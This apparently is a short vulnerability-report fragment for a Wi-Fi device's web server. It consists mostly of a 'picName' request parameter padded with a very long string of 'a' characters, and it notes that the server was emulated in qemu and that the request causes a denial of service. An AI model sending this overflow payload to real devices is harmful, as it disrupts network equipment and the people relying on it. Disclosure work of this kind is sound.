picName=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

Start httpd using qemu

 

DOS caused by sending request

Tag

#wifi